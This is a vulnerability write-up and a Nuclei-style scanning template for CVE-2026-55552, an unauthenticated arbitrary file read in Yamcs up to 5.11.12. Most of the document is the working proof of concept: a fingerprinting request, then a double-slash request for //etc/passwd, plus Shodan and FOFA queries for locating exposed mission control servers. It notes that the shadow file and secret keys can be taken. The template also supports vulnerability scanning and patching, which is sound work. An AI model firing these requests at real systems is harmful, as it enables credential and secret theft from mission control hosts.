Yamcs through 5.11.12 serves static web resources through a handler that resolves the requested path against the configured web root without rejecting absolute paths. A request path that begins with a double slash is resolved as an absolute filesystem path, discarding the web root, and the handler returns the referenced file from the underlying host, letting unauthenticated attackers read any non-hidden file readable by the Yamcs service account whose path contains no dot segment.
PoC
id: CVE-2026-55552
info:
name: Yamcs <=5.11.12 - Arbitrary File Read
author: aryu-ru,AbdrrahimDahmani
severity: high
description: |
Yamcs through 5.11.12 serves static web resources through a handler that resolves the requested path against the configured web root without rejecting absolute paths. A request path that begins with a double slash is resolved as an absolute filesystem path, discarding the web root, and the handler returns the referenced file from the underlying host, letting unauthenticated attackers read any non-hidden file readable by the Yamcs service account whose path contains no dot segment.
impact: |
Unauthenticated attackers can read arbitrary files from the host running Yamcs, including the shadow password file and the installation secret key stored in yamcs.yaml, potentially leading to full compromise of the mission control system.
remediation: |
Update to version 5.11.13, or 5.12.0 or later, which constrain resolved static file paths to the configured static roots.
reference:
- https://github.com/yamcs/yamcs/security/advisories/GHSA-9jg3-g3wh-w9pj
- https://github.com/yamcs/yamcs/commit/f4bc588880c166849e983aa8f65b9c8107d06091
- https://github.com/yamcs/yamcs/commit/c7dfd24e469ae1086c23e0fe04401cb1ce4260d4
- https://github.com/yamcs/yamcs/releases/tag/yamcs-5.11.13
- https://nvd.nist.gov/vuln/detail/CVE-2026-55552
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-55552
epss-score: 0.01722
epss-percentile: 0.76784
cwe-id: CWE-22
metadata:
verified: true
max-request: 2
vendor: yamcs
product: yamcs
shodan-query: http.html:"Yamcs Mission Control"
fofa-query: body="Yamcs Mission Control"
tags: cve,cve2026,yamcs,lfi,traversal,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "Yamcs Mission Control")'
internal: true
- raw:
- |
GET //etc/passwd HTTP/1.1
Host: {{Hostname}}
disable-path-automerge: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/octet-stream")'
- 'regex("root:.*:0:0:", body)'
condition: and
# digest: 490a0046304402203456a9009db66740c33ed72fc9636dee14bd0bb02f6d9aa48961dc152bc99eae0220261100ebf36a31a0f6efa2531b6d34ddfc8201ebf23a0a45ff9bfe136c5e2bad:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.